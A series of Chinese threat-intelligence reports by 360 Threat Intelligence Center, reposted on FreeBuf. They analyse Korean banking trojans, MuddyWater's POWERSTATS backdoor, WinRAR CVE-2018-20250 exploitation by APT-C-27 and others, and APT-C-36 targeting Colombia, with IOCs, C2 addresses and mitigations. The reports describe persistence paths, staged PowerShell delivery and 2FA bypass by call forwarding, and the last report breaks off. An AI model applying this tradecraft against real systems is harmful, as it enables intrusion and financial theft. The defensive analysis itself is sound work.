背景

360威胁情报中心近期发现一例针对韩国手机银行用户的黑产活动,其最早活动可能从2018年12月22日起持续至今,并且截至文档完成时,攻击活动依然活跃,结合木马程序和控制后台均为韩语显示,我们有理由认为其是由韩国的黑产团伙实施。

其攻击平台主要为Android,攻击目标锁定为韩国银行APP使用者,攻击手段为通过仿冒多款韩国银行APP,在诱骗用户安装成功并运行的前提下,窃取用户个人信息,并远程控制用户手机,以便跳过用户直接与银行连线验证,从而窃取用户个人财产。

截至目前,360威胁情报中心一共捕获了55种的同家族Android木马,在野样本数量高达118个,并且经过关联分析,我们还发现,该黑产团伙使用了300多个用于存放用户信息的服务器。

由于我们初始捕获的样本中,上传信息的URL包含有一个字段:KBStar,而KB也表示为korean bank的缩写,基于此进行联想,我们认为该团伙实乃韩国银行的克星,即Buster,因此我们将该黑产团伙命名为KBuster。

下面为分析过程。

诱饵分析

在捕获到一批伪造成韩国银行APP的诱饵后,我们首先对APP的图标以及伪造的APP名称进行归类,以便对这个针对安卓手机用户的团伙进行一个目标画像。

主要伪造的韩国银行为以下几家:

而当打开其中一个仿照的银行APP后(国民银行),可见界面如下所示:

点击指定页面会显示出对应的营业员照片。

框架分析

由于捕获的安卓样本均使用一套框架,并且变种之间均改动不大,因此我们将其中一个典型样本进行剖析,并总结出KBuster家族APP的具体特征。

样本信息

文件名称 국민은행.apk
软件名称 국민은행(翻译:国民银行)
软件包名 com.kbsoft8.activity20190313a
MD5 2FE9716DCAD75333993D61CAF5220295
样本图标 image.png

样本执行流程图如下所示。

该木马运行以后会弹出仿冒为“国民银行”的钓鱼页面,并诱骗用户填写个人信息;

而此时,木马会在后台获取用户通讯录、短信内容并上传至固定服务器,并会在服务器对用户手机进行监控,每隔5秒对用户手机当前状态进行刷新,从而达到实时监控

除此之外,该木马会对用户手机进行远控操作,并可对韩国相关银行等金融行业的369个电话号码进行呼叫转移操作从而绕过银行双因素认证,还可以监听手机通话、修改来电铃声、私自挂断用户来电并拉黑来电号码等操作。

代码分析

一、获取用户手机通讯录、短信并上传到服务器。

获取用户通讯录:

获取用户短信:

将获取到的用户信息上传到服务器:

服务器配置信息:

上传获取到的用户信息:

二、对用户手机进行远程控制

更该用户手机铃声:

对用户手机进行来电转移操作,当来电号码已经存在,在所窃取的号码中时,挂断电话并拉黑该号码:

其他该家族的木马与上述代码几乎一致,更改的部分较少,因此可以确定为同家族木马。

溯源分析

通过分析木马程序,我们可以获取到,用于储存用户数据的FTP服务器的账号、密码,服务器截图如下:

其中一个受害者的被加密后的短信、通讯录文件:

解密后的数据:

此外,我们通过一些特殊手段获取到用于监控的服务器账号和密码,下图为远控服务器显示页面。

原始韩文页面显示:

翻译为中文页面显示:

呼叫转移设置,可以呼叫转移369个韩国银行及金融机构的电话:

这里我们可以看到,呼叫转移设置中的强制接收和强制传出的电话号码主要为韩国银行的电话号码,我们对其作用做出几点推测:

1. 通过设置银行号码的呼叫转移可以将用户和银行的呼叫直接转移到攻击者的手机中,并且由于受害者的短信也可以被攻击者实时获取,因此可以绕过银行在进行财产交易的短信验证码或语音验证码的双印子认证方式。

2. 拦截银行号码也可用于在银行方面发现用户账户异常行为并进行电话确认过程,这样用户无法正常接收到银行来源的相关通知。

拉黑用户手机电话号码页面:

在对捕获到的所有KBuster团伙的APK样本进行分析后,我们发现使用300多个服务器从事黑产业务,且IP基本为连号设置,从上面的分析可以得知,其会随机选择一个服务器进行信息上传。可见其团伙幕后财力深厚。

除此之外,我们在对所有受害者的用户数据大小进行初步统计后,发现收集的信息量高达3个G,并且目前该APP仍在上传信息,并且家族变种每日都会有新增,活动异常活跃。

并且,我们通过样本中一个密钥进行关联搜索后,关联到同样是伪装成韩国银行的木马样本,并且其木马代码中的注释信息同样为中文。

从木马的功能来看,其主要对中马用户手机的诸如短信、通讯录等信息进行收集和回传,其功能和国内在过去几年的“短信拦截马”的功能和意图相似。

由于我们通过加密密钥关联到包含中文信息的类似功能的木马程序,结合过去国内“短信拦截马”类黑产组织的特点和模式,我们推测该类木马程序的早期版本也有可能是由国内黑产人员参与开发制作,并被韩国马仔等使用来针对韩国银行手机用户的攻击。

基于此,从攻击目标和远控后台所使用语言,我们认为KBuster团伙是一个疑似来自韩国的黑产团伙,其幕后财力深厚,并且不排除与国内黑产团伙存在联系,

总结

KBuster为2019年发现的最活跃的伪造银行类APK的黑产团伙,其使用300多个服务器从事黑产业务,并使用了绕过银行双因子认证的手法进行用户财产窃取的手法,无不透露了该组织的专业性。

由于目前无法统计受害者的经济损失,并且APP仍然在窃取用户财产,因此我们披露了此次行动,希望韩国警方可以尽快处理,也希望其他用户在使用手机的过程中,切莫安装未知来源的手机应用,尽可能的在正规的第三方应用市场进行应用下载,防止被不法分子窃取隐私和个人财产。

*本文作者:360天眼实验室,转载请注明来自FreeBuf.COM

背景

近期, 360 威胁情报中心截获到一个针对伊拉克移动运营商 ( Korek Telecom)的定向攻击样本。该运营商是伊拉克发展最快的移动公司,服务于伊拉克的 18 个省份,为企业、政府和个人用户提供服务。攻击样本使用鱼叉式钓鱼邮件进行投递:诱导受害者打开附件 Office Word 文档,并启用恶意宏。恶意宏代码最终会释放执行 PowerShell 后门,从而实现对受害者计算机的远程控制。 360 威胁情报中心经过溯源和关联后发现,该攻击活动疑似与 MuddyWater APT组织相关,并溯源和分析了多个与之相关的恶意样本。

MuddyWaterAPT 组织可能来自伊朗 [1],其相关活动可追溯到 2017 年初,其主要针对政府机构、通信和石油公司。 2017 年 11 月, Palo Alto 在对多个攻击进行关联分析后,将该组织命名为 MuddyWater [2]。进入 2018 年后,其目标地区不再局限于伊朗和沙特,更是拓展到了亚洲、欧洲和非洲 [3],目标性质也涵盖了军事实体、教育机构等。

样本分析

钓鱼邮件

文件名 missan dashboard.msg
MD5 83c31845c0de88578cf94c9655654795 

攻击者伪装为公司内部人员,在邮件中提到3月报告有错误,并指出在附件中有详细描述,从而诱使受害者下载并打开附件中的诱饵文档:

通过收件人邮箱@korektel.com,我们发现该受害者邮箱是伊拉克移动运营商Korek企业邮箱:

考虑到邮件相关内容与公司日常业务有关,因此我们怀疑本次攻击活动是针对该企业的一次定向攻击活动。

Dropper

文件名 Missan dashboard.doc
MD5 806ADC79E7EA3BE50EF1D3974A16B7FB

附件中的Office Word文档含有恶意的宏代码,通过模糊化文档背景内容来诱导受害者启动宏:

一旦受害者启动宏,恶意宏代码便会执行,随后弹出虚假报错窗口,从而误导受害者:

恶意宏代码隐藏在窗体中,猜测是为了增加检测的难度:

宏代码将PowerShell启动脚本写入注册表HKEY_CURRENT_USER\Software\Classes\CLSID\{769f9427-3cc6-4b62-be14-2a705115b7ab}\Shell\Manage\command,并在启动项下写入数据,当受害者用户重启或登录系统都会执行该 PowerShell :

之后将配置文件写入c:\windows\temp\picture.jpg:

最后释放c:\windows\temp\icon.ico,该文件用于后续启动PowerShell进程:

PowerShell

PowerShell经多层混淆以干扰分析人员分析,经处理后的代码如下:

代码首先从c:\windows\temp\picture.jpg读取配置文件,经Base64解码处理后执行:

第二阶段的PowerShell脚本如下:

可见脚本依旧混淆严重,经多层解混淆后得到PowerShell后门,该后门为MuddyWater常用的POWERSTATS后门:

POWERSTATS后门

后门在运行时首先获取计算机系统名、计算机名、用户名以及IP等信息:

当前计算机公网IP通过访问icanhazip.com获取:

将获取的信息以“**”链接,并加密处理:

之后与C2(46.105.84.146)通信,若返回数据为”done”则继续执行:

获取的信息将被加密发送到C2,以获取远程命令:

命令分发函数如下:

命令功能描述如下:

命令 功能
upload 下载文件
cmd 利用cmd执行数据
b64 将数据经Base64解码后调用PowerShell执行
其他 直接调用PowerShell执行数据

溯源与关联

360 威胁情报中心通过对此次攻击活动的 TTPs 以及木马进行关联分析后发现,此次攻击活动疑似与 MuddyWater APT 组织相关。

TTPs

本次攻击活动手法与之前MuddyWater的攻击活动相似,诱饵文档都利用模糊图片诱导受害者启用宏,且宏在启动后都会弹出错误提示框误导用户。卡巴斯基[3]曾曝光多个MuddyWater攻击样本如下:

可见其诱饵文档手法与本次攻击活动基本一致。

PowerShell后门

本次攻击使用的是MuddyWater组织常用的POWERSTATS后门:

大数据关联

样本的C2信息在360威胁情报分析平台(ti.360.net)已被打上MuddyWater相关标签:

拓展

通过公开威胁情报信息关联,360威胁情报中心发现多个疑似MuddyWater组织近期发起的攻击活动,相关信息如下。

相同的POWERSTATS后门

诱饵文件名(包含恶意宏代码) MD5
Gladiator_CRK.doc 09aabd2613d339d90ddbd4b7c09195a9
Important Report.doc 0d69debf5b805b0798429e5fca91cb99

Gladiator_CRK.doc

基于公开威胁情报信息关联到与本次攻击活动后续后门相同的另外两个诱饵文档。通过其诱饵文档内容,我们发现该攻击活动目标疑似与伊拉克库尔德斯坦 有关:

新的PowerShell后门

诱饵文件(包含恶意宏代码)MD5
cf3c731ca73ddec5d9cdd29c680c0f20

与MuddyWater组织惯用手法一致,通过背景内容的模糊化来诱导用户启用宏:

与之前的样本类似,宏隐藏在窗体中。宏代码将释放配置文件到C:\ProgramData\Win32ApiSyncLog.txt,并执行文件C:\ProgramData\Win32ApiSync.bat。之后再在启动目录下释放Win32ApiSyncTskSchdlr.bat用于把Win32ApiSync.bat添加到计划任务启动:

Win32ApiSync.bat利用PowerShell读取执行Win32ApiSyncLog.txt,经多层去混淆后得到最终的PowerShell后门如下:

此后门似乎是重写的新后门,但其与之前使用的后门也具有较大的相似性,比如都会把获取的计算机基本信息以“*”连接后再计算MD5:

然后与C2(94.23.148.194/serverScript/clientFrontLine/helloServer.php)尝试通信,当C2返回“BYE”时则重复尝试上线请求,否则进行后续操作:

之后将获取的加密信息发送到C2(http://94.23.148.194/serverScript/clientFrontLine/getCommand.php)以获取指令,获取的指令将被保存到全局变量gLobAl:GetCMdREsULt中:

指令执行后的结果将被发送到:94.23.148.194/serverScript/clientFrontLine/setCommandResult.php

总结

MuddyWater 组织从被发现至今有两年左右的时间,期间该组织就实施了大量的攻击行动,并在攻击过程中使用了多种公开的或自有的恶意程序。攻击者通过不断改进他们的工具库,以减少被安全公司发现的可能性。

该组织很擅长社会工程学,通过向目标定向发送各类诱饵文档进行攻击,诱饵文档通常通过恶意宏来执行后续代码。这种攻击方式 需要更多的用户交互,尽管这样会降低其攻击的成功率,但可以通过更有针对性的邮件内容和更具迷惑性的文档信息来提高成功率。此外,相对于使用Office 0day,这类攻击具有很好的成本优势,因此仍被许多攻击组织大量采用。企业用户应尽可能小心打开来源不明的文档,如有需要可通过打开Office Word文档中的:文件-选项-信任中心-信任中心设置-宏设置,来禁用一切宏代码执行。

目前,基于360威胁情报中心的威胁情报数据的全线产品,包括360威胁情报平台(TIP)、天擎、天眼高级威胁检测系统、360 NGSOC等,都已经支持对此类攻击的精确检测。

IOC

MD5
83c31845c0de88578cf94c9655654795(missan dashboard.msg)
806adc79e7ea3be50ef1d3974a16b7fb(Missan dashboard.doc)
09aabd2613d339d90ddbd4b7c09195a9(Gladiator_CRK.doc)
0d69debf5b805b0798429e5fca91cb99(Important Report.doc)
a61b268e9bc9b7e6c9125cdbfb1c422a(Report-20190316.zip)
cf3c731ca73ddec5d9cdd29c680c0f20
C&C
46.105.84.146:80
94.23.148.194/serverScript/clientFrontLine/helloServer.php
94.23.148.194/serverScript/clientFrontLine/getCommand.php
94.23.148.194/serverScript/clientFrontLine/setCommandResult.php

参考链接

[1].https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/

[2].https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/

[3].https://securelist.com/muddywater/88059/

[4].https://securityaffairs.co/wordpress/78748/apt/muddywater-infection-chain.html

[5].https://twitter.com/360TIC/status/1108616188173520896

*本文作者:360天眼实验室,转载请注明来自FreeBuf.COM

背景

2019年3月17日,360威胁情报中心截获了一例疑似“黄金鼠”APT组织(APT-C-27)利用WinRAR漏洞(CVE-2018-20250[6])针对中东地区的定向攻击样本。该恶意ACE压缩包内包含一个以恐怖袭击事件为诱饵的Office Word文档,诱使受害者解压文件,当受害者在本地计算机上通过WinRAR解压该文件后便会触发漏洞,漏洞利用成功后将内置的后门程序(Telegram Desktop.exe)释放到用户计算机启动项目录中,当用户重启或登录系统都会执行该远控木马,从而控制受害者计算机。

360威胁情报中心通过关联分析后发现,该攻击活动疑似与“黄金鼠”APT组织(APT-C-27)相关,并且经过进一步溯源与关联,我们还发现了多个与该组织相关的Android平台的恶意样本,这类样本主要伪装成一些常用软件向特定目标人群进行攻击,结合恶意代码中与攻击者相关的文字内容,可以猜测攻击者也比较熟悉阿拉伯语。

image.png

后门程序(TelegramDesktop.exe)在VirusTotal上的检测情况

样本分析

360威胁情报中心针对该利用WinRAR漏洞的样本进行了分析,相关分析如下。

利用恐袭事件诱导解压

MD5 314e8105f28530eb0bf54891b9b3ff69
文件名  

该恶意压缩文件包含一个OfficeWord文档,文档内容为一次恐怖袭击相关事件。中东地区由于其政治、地理等特殊性,该地区遭受恐怖袭击繁多,人民深受其害,所以该地区人民对于恐怖袭击等事件敏感,致使受害者解压文档的可能性增加:

image.png

诱饵文档翻译内容 

用户如果解压该恶意压缩包,则会触发WinRAR漏洞,从而释放内置的后门程序到用户启动目录中:

image.png

当用户重新启动计算机或登录系统后将执行释放的后门程序Telegram Desktop.exe。

Backdoor(Telegram Desktop.exe)

文件名 Telegram Desktop.exe
MD5 36027a4abfb702107a103478f6af49be
SHA256 76fd23de8f977f51d832a87d7b0f7692a0ff8af333d74fa5ade2e99fec010689
编译信息 .NET

后门程序TelegramDesktop.exe会从PE资源中读取数据并写入到:%TEMP%\Telegram Desktop.vbs,随后执行该VBS脚本,并休眠17秒直到VBS脚本运行完成:

image.png

该VBS脚本的主要功能为通过Base64解码内置的字符串,并将解码后的字符串写入到文件:%TEMP%\Process.exe,最后执行Process.exe:

image.png

Process.exe执行后会在%TEMP%目录下创建文件1717.txt,并写入与最终执行的后门程序相关的数据,以供Telegram Desktop.exe后续使用:

image.png

随后TelegramDesktop.exe便会读取1717.txt文件的内容,并将其中的特殊字符替换:

image.png

之后再通过Base64解码数据,并在内存中加载执行解码后的数据:

image.png

最终在内存中加载执行的数据为njRAT后门程序,相关配置信息如下:

image.png

njRAT

内存加载执行的njRAT后门程序会首先创建互斥量,保证只有一个实例运行:

image.png

并判断当前运行路径是否为配置文件中设置的路径,若不是则拷贝自身到该路径启动执行:

image.png

随后关闭附件检查器和防火墙:

image.png

并开启键盘记录线程,将键盘记录的结果写入注册表:

image.png

开启通信线程,与C&C地址建立通信并接受命令执行:

image.png

该njRAT远控还具有远程SHELL、插件下载执行、远程桌面、文件管理等多个功能:

image.png

Android平台样本分析

360威胁情报中心通过VirusTotal还关联到了“黄金鼠”(APT-C-27)APT组织最近使用的多个Android平台的恶意样本,其同样使用了82.137.255.56作为C&C地址(82.137.255.56:1740):

image.png

而近期关联到的Android平台后门样本主要伪装为Android系统更新、Office升级程序等常用软件。我们以伪装为Office升级程序的Android样本为例进行了分析,相关分析如下:

文件MD5 1cc32f2a351927777fc3b2ae5639f4d5
文件名 OfficeUpdate2019.apk

该Android样本启动后,会诱导用户激活设备管理器,接着隐藏图标并在后台运行:

image.png

诱导用户完成安装后,样本会展示如下界面:

image.png

接着样本将通过Android默认的SharedPreferences存储接口来获取上线的IP地址和端口,如果获取不到,就解码默认的硬编码IP地址和端口上线:

image.png

image.png

相关IP地址的解码算法:

image.png

最终解码后的IP地址为:82.137.255.56,端口也是需要把硬编码后的端口加上100来得到最终的端口1740:

image.png

当连接C&C地址成功后,便会发送上线包、接受控制者的命令并执行。该样本具有录音、拍照、GPS定位、上传联系人/通话记录/短信 /文件、执行云端命令等功能:

image.png

Android后门样本的相关指令及功能列表如下:

指令 功能
16 心跳打点
17 connect
18 获取指定文件的基本信息
19 下载文件
20 上传文件
21 删除文件
22 按照云端指令复制文件
23 按照云端指令移动文件
24 按照云端指令重命名文件
25 运行文件
28 按照云端指令创建目录
29 执行云端命令
30 执行一次ping命令
31 获取并上传联系人信息
32 获取并上传短信
33 获取并上传通话记录
34 开始录音
35 停止并上传录音文件
36 拍照
37 开始GPS定位
38 停止GPS定位并上传位置信息
39 使用云端发来的ip/port
40 向云端报告当前使用的ip/port
41 获取已安装应用的信息

值得注意的是,在该样本回传的命令信息中包含了阿拉伯语的相关信息,因此我们推测攻击者有较大可能熟悉使用阿拉伯语:

image.png

溯源与关联

通过查询本次捕获的后门程序C&C地址(82.137.255.56:1921)可知,该IP地址自2017年起便多次被APT-C-27(黄金鼠)组织使用,该IP地址疑似为该组织的固有IP资产。通过360网络研究院大数据关联平台可以看到与该IP地址关联的多个样本信息:

image.png

通过360威胁情报中心威胁分析平台(ti.360.net)查询该C&C地址,也被打上了APT-C-27相关的标签:

image.png

并且从本次捕获到的相关木马样本(Windows和Android平台)的功能模块、代码逻辑、内置信息语言、目标人群、网络资产等信息都和早前曝光的APT-C-27[2]使用的木马样本信息高度相似。所以360威胁情报中心认为本次截获的相关样本同样也与“黄金鼠”APT组织(APT-C-27)相关。

总结

正如我们的预测,利用WinRAR漏洞(CVE-2018-20250)传播恶意程序的攻击行为正处在爆发阶段,360威胁情报中心此前观察到多个利用此漏洞进行的APT攻击活动,而本次截获的疑似“黄金鼠”APT组织(APT-C-27)利用WinRAR漏洞的定向攻击活动仅仅只是众多利用该漏洞实施定向攻击案例中的一例。因此360威胁情报中心再次提醒各用户及时做好该漏洞防护措施。(见“缓解措施”一节)

缓解措施

1、  软件厂商已经发布了最新的WinRAR版本,360威胁情报中心建议用户及时更新升级WinRAR(5.70 beta 1)到最新版本,下载地址如下:

32 位:http://win-rar.com/fileadmin/winrar-versions/wrar57b1.exe

64 位:http://win-rar.com/fileadmin/winrar-versions/winrar-x64-57b1.exe

2、  如暂时无法安装补丁,可以直接删除漏洞的DLL(UNACEV2.DLL),这样不影响一般的使用,但是遇到ACE的文件会报错。

目前,基于360威胁情报中心的威胁情报数据的全线产品,包括360威胁情报平台(TIP)、天擎、天眼高级威胁检测系统、360 NGSOC等,都已经支持对此类攻击的精确检测。

IOCs

恶意ACE文件MD5
314e8105f28530eb0bf54891b9b3ff69
Backdoor(Telegram Desktop.exe) MD5
36027a4abfb702107a103478f6af49be
Process.exe
ec69819462f2c844255248bb90cae801
Backdoor MD5
83483a2ca251ac498aac2abe682063da
9dafb0f428ef660d4923fe9f4f53bfc0
2bdf97da0a1b3a40d12bf65f361e3baa
1d3493a727c3bf3c93d8fd941ff8accd
6e36f8ab2bbbba5b027ae3347029d1a3
72df8c8bab5196ef4dce0dadd4c0887e
Android样本
5bc2de103000ca1495d4254b6608967f(بو أيوب – القريتين أبو محمد.apk)
ed81446dd50034258e5ead2aa34b33ed(chatsecureupdate2019.apk)
1cc32f2a351927777fc3b2ae5639f4d5(OfficeUpdate2019.apk)
PDB路径
C:\Users\Albany\documents\visual studio 2012\Projects\New March\New March\obj\Debug\New March.pdb
C:\Users\Albany\documents\visual studio 2012\Projects\March\March\obj\Debug\March.pdb
C:\Users\Albany\documents\visual studio 2012\Projects\December\December\obj\Debug\December.pdb
C&C
82.137.255.56:1921
82.137.255.56:1994
82.137.255.56:1740

参考链接

[1].https://twitter.com/360TIC

[2].https://ti.360.net/blog/articles/analysis-of-apt-c-27/(黄金鼠组织–叙利亚地区的定向攻击活动)

[3]. https://mp.weixin.qq.com/s/dkyD2k6dqt5SYS7qLPOqfw(无法解密!首个利用WinRAR漏洞传播的未知勒索软件(JNEC)分析)

[4].https://mp.weixin.qq.com/s/hAoee3Z90FyxSdomHfqZqA(警惕!WinRAR漏洞利用升级:社工、加密、无文件后门)

[5].https://mp.weixin.qq.com/s/Hz-uN9VEejYN6IHFBtUSRQ(首个完整利用WinRAR漏洞传播的恶意样本分析)

[6].https://research.checkpoint.com/extracting-code-execution-from-winrar/

[7].https://ti.360.net/advisory/articles/360ti-sv-2019-0009-winrar-rce/

*本文作者:360天眼实验室,转载请注明来自FreeBuf.COM

背景

2019年2月22日,360威胁情报中心截获了首个利用WinRAR漏洞(CVE-2018-20250)传播木马程序的恶意ACE文件。并提醒用户务必对此高危漏洞做好十足的防护措施。

正如我们的预测,在接下来的几天内,360威胁情报中心截获了多个使用WinRAR漏洞传播恶意程序的样本,并且我们还观察到了多个利用此漏洞进行的APT攻击活动。可以明显的看到,攻击者针对该漏洞利用做了更精心的准备,比如利用WinRAR压缩包内图片列表不可预览来诱导目标极大概率解压恶意文件、将恶意ACE文件加密后投递、释放“无文件”后门等。

事实证明,利用该漏洞传播恶意程序的攻击行为正处在爆发的初期阶段,并且不排除在将来被攻击者用于制作蠕虫类的病毒造成更广泛的威胁。360威胁情报中心再次提醒各用户及时做好漏洞防护措施。(见“缓解措施”一节)

样本分析

360威胁情报中心针对最具代表性的几类样本进行了分析,相关分析如下。

利用图片列表诱导解压:

MD5 d7d30c2f26084c6cfe06bc21d7e813b1
文件名 10802201010葉舒華.rar

该恶意压缩文件利用了WinRAR压缩包内图片列表不可预览的特性,诱导目标大概率解压文件从而触发漏洞。当受害者打开RAR压缩包后可以看到很多图片文件:

image.png

出于好奇,用户一般会点击打开其中的一张图片查看:

image.png

如果受害者对图片内容很感兴趣,但WinRAR又无法预览所有图片的情况下,则只好解压该压缩包,这样漏洞则会被触发,极大的提高了攻击成功率,解压后的诱饵图片列表:

image.png

漏洞触发后,会在%AppData%\Microsoft\Windows\StartMenu\Programs\Startup目录释放OfficeUpdateService.exe,当用户重启计算机或者注销登录后将执行恶意代码:

image.png

Backdoor(OfficeUpdateService.exe)

OfficeUpdateService.exe是使用C#编写的远控程序,其通信地址为conloap.linkin.tw:8080。其提供的功能大致有计算机管理(重启/关闭)、文件管理(上传/下载/遍历)、远程SHELL、木马管理(安装/卸载)、屏幕抓取、录音等功能。

image.png

image.png

C&C地址为:conloap.linkin.tw:8080

image.png

多个类似样本

此外,我们还捕获到数个国外类似利用社会工程学和该漏洞结合的攻击样本。

MD5 f8c9c16e0a639ce3b548d9a44a67c8c1
文件名 111.rar

解压后的诱饵图片列表:

image.png

MD5 f9564c181505e3031655d21c77c924d7
文件名 test.rar

解压后的诱饵图片列表:

image.png

目标阿拉伯地区:释放“无文件”后门

MD5 e26ae92a36e08cbaf1ce7d7e1f3d973e
文件名 JobDetail.rar

该样本包含了一份工作地点位于沙特阿拉伯的招聘广告PDF文档(诱饵),如果用户使用WinRAR解压该文件并触发漏洞后,WinRAR会释放恶意脚本Wipolicy.vbe到用户开机启动目录,最终的恶意代码为PowerShell编写的远程控制程序,整个执行过程全部在内存中实现,其通信地址为:hxxps://manage-shope.com:443。

该样本包含一份工作招聘广告,如下图所示:

image.png

招聘广告中工作地点位于沙特阿拉伯:

image.png

漏洞触发后会在%AppData%\Microsoft\Windows\StartMenu\Programs\Startup目录释放Wipolicy.vbe:

image.png

Wipolicy.vbe分析

该样本为加密的VBS脚本,解密后的部分脚本如下图所示:

image.png

该VBS脚本将执行一段PowerShell脚本,PowerShell脚本解密后如下图:

image.png

该段PowerShell会下载hxxp://local-update.com/banana.png并利用图片隐写术解密出第二段PowerShell脚本,脚本部分内容如下图:

image.png

第二段PowerShell脚本将从hxxps://manage-shope.com:443下载第三段数据并利用AES解密为第三段PowerShell脚本,以下是第三段PowerShell部分脚本:

image.png

该PowerShell脚本包含了完整的远程控制代码,提供的功能有启动多个CMD、上传文件、下载文件、加载执行模块、执行其他PowerShell脚本等功能,其通信地址为:hxxps://manage-shope.com:443

加密的ACE文件

MD5 65e6831bf0f3af34e19f25dfaef49823
文件名 Сбор информации для переезда в IQ-квартал.rar

另外,我们还捕获到了一个加密的恶意ACE文件,由于恶意文件使用密码加密,故我们暂时无法得知最终释放的恶意代码内容。不过可以发现,攻击者也在尝试将恶意ACE文件进行加密来防止受害者以外的人员获取其中的恶意代码,具有较高的针对性和自我保护意识。

360威胁情报中心针对ACE文件的加解密过程进行了分析,过程如下:

首先,该恶意ACE样本进行了加密,但是解压时输入错误密码,仍然可以看到会解压到对应的启动目录下:

image.png

但该样本实际上并没有解压成功:

image.png

于是我们分析了WinRAR在处理带密码的ACE数据的处理过程,WinRAR中UNACEV2.dll的加载入口如下:

image.png

对应的函数如下,专门用于处理ACE的压缩包文件:

image.png

86行的函数对应解压到当前目录的操作:

image.png

进入函数sub_1395F10,该函数第74行对应了漏洞的入口点,运行之后对应的目标的释放文件将被创建:

image.png

之后进入解压逻辑,UNACEV2包含了自身的解压逻辑,因此和WinRAR无关,整个解压写入文件过程如下:

1.首先通过函数fun_Allocmemory分配一段用于存放解压数据的内存,其大小和解压数据一致;

2.再通过函数fun_GetEncryptkey获取用户输入的密钥;

3.然后通过函数fun_DecryptCompress解压对应的数据到第一步分配的内存中;

4.最后通过函数fun_EctraceoFile将内存中的数据写入到之前的文件中。

这样就导致即使输入了错误的密码依然会将第一份分配的初始化内存写入到启动目录下:

image.png

我们创建了一个测试ACE文件,如下所示分配的内存地址为0x0b4a0024:

image.png

获取压缩包的密钥A1B2C3D4E5:

image.png

如下所示解压出的对应内容:

image.png

当输入错误的密码时,依然会写入数据,写入的数据为乱码:

image.png

总结

截止文章完成时,360威胁情报中心还陆续观察到了多个利用此漏洞进行的APT攻击活动。

事实证明,利用WinRAR漏洞(CVE-2018-20250)传播恶意程序的攻击行为正处在爆发的初期阶段,并且不排除在将来被攻击者用于制作蠕虫类的病毒造成更广泛的威胁。360威胁情报中心再次提醒各用户及时做好漏洞防护措施。

缓解措施

1.软件厂商已经发布了最新的WinRAR版本,360威胁情报中心建议用户及时更新升级WinRAR(5.70 beta 1)到最新版本,下载地址如下:

32位:http://win-rar.com/fileadmin/winrar-versions/wrar57b1.exe

64位:http://win-rar.com/fileadmin/winrar-versions/winrar-x64-57b1.exe

2.如暂时无法安装补丁,可以直接删除漏洞的DLL(UNACEV2.DLL),这样不影响一般的使用,但是遇到ACE的文件会报错。

目前,基于360威胁情报中心的威胁情报数据的全线产品,包括360威胁情报平台(TIP)、天擎、天眼高级威胁检测系统、360 NGSOC等,都已经支持对此类攻击的精确检测。

IOC

恶意ACE文件MD5
d7d30c2f26084c6cfe06bc21d7e813b1
f9564c181505e3031655d21c77c924d7
65e6831bf0f3af34e19f25dfaef49823
9cfb87f063ab3ea5c4f3934a23e1d6f9
f8c9c16e0a639ce3b548d9a44a67c8c1
e26ae92a36e08cbaf1ce7d7e1f3d973e
木马MD5
782791b7ac3daf9ab9761402f16fd407
恶意脚本MD5
ad121c941fb3f4773701323a146fb2cd
C&C
manage-shope.com:443

参考链接

[1].https://mp.weixin.qq.com/s/Hz-uN9VEejYN6IHFBtUSRQ(首个完整利用WinRAR漏洞传播的恶意样本分析)

[2].https://research.checkpoint.com/extracting-code-execution-from-winrar/

[3].https://twitter.com/360TIC/status/1099987939818299392

[4].https://ti.360.net/advisory/articles/360ti-sv-2019-0009-winrar-rce/

*本文作者:360天眼实验室,转载请注明来自FreeBuf.COM

一、背景

从2018年4月起至今,一个疑似来自南美洲的APT组织盲眼鹰(APT-C-36)针对哥伦比亚政府机构和大型公司(金融、石油、制造等行业)等重要领域展开了有组织、有计划、针对性的长期不间断攻击。

其攻击平台主要为Windows,攻击目标锁定为哥伦比亚政企机构,截止目前360威胁情报中心一共捕获了29个针对性的诱饵文档,Windows平台木马样本62个,以及多个相关的恶意域名。

2018年4月,360威胁情报中心捕获到第一个针对哥伦比亚政府的定向攻击样本,在此后近一年时间内,我们又先后捕获了多起针对哥伦比亚政企机构的定向攻击。攻击者习惯将带有恶意宏的MHTML格式的Office Word诱饵文档通过RAR加密后配合鱼叉邮件对目标进行投递,然后将RAR解压密码附带在邮件正文中,具有很好的躲避邮件网关查杀的效果。其最终目的是植入Imminent后门以实现对目标计算机的控制,为接下来的横向移动提供基础。

360威胁情报中心通过分析攻击者投递的多个加密的Office Word文档的最后修改时间、MHTML文档字符集(语言环境)、攻击者使用的作者名称等信息,并结合地缘政治等APT攻击的相关要素,判断攻击者疑似来自于UTC时区在西4区(UTC-4)正负1小时对应的地理位置区域(南美洲)。

由于该组织攻击的目标中有一个特色目标是哥伦比亚盲人研究所,而哥伦比亚在足球领域又被称为南美雄鹰,结合该组织的一些其它特点以及360威胁情报中心对 APT 组织的命名规则,我们将该组织命名为盲眼鹰(APT-C-36)。

二、攻击目标和受害者分析

根据关联到的样本对受害者进行分类统计后,我们发现攻击者主要针对哥伦比亚的政府机构和大型公司,其目的是植入Imminent后门以实现对目标计算机的控制,为接下来的横向移动等攻击行为提供基础。从受害者的背景信息来看,攻击者所关注的政企机构在战略层面有重大意义,同时也不排除其同时有窃取商业机密和知识产权的动机。

伪装来源及行业分布

基于360威胁情报中心对该APT组织的攻击信息统计显示,攻击者伪装成哥伦比亚国家民事登记处、哥伦比亚国家税务和海关总署、哥伦比亚国家统计局、哥伦比亚国家网络警察局、哥伦比亚国家司法部门,对哥伦比亚的政府、金融机构,本国大型企业或跨国公司的哥伦比亚分公司进行攻击,相关信息统计如下。

诱饵伪装来源 攻击目标
哥伦比亚国家民事登记处 哥伦比亚国家盲人研究所
哥伦比亚国家税务和海关总署 哥伦比亚国家石油公司
哥伦比亚石油公司(Hocol)
哥伦比亚车轮制造商(IMSA)
哥伦比亚Byington公司
哥伦比亚国家统计局 哥伦比亚物流公司(Almaviva)
哥伦比亚国家网络警察局 哥伦比亚国家金融机构(BancoAgrario)
哥伦比亚国家司法部门 哥伦比亚银行(Banco de Occidente)
ATH哥伦比亚分部
哥伦比亚移民权力机构 Sun Chemical哥伦比亚分部

攻击者使用的部分恶意域名也仿冒了哥伦比亚的政府网站,比如diangovcomuiscia.com从名称上仿冒了muiscia.dian.gov.co,而后者是哥伦比亚税务与海关总署官网。

攻击者对使用的木马程序的公司信息也进行了伪造,相关列表如下:

木马程序公司信息 公司信息
Abbott Laboratories 位于美国的一家医疗保健公司
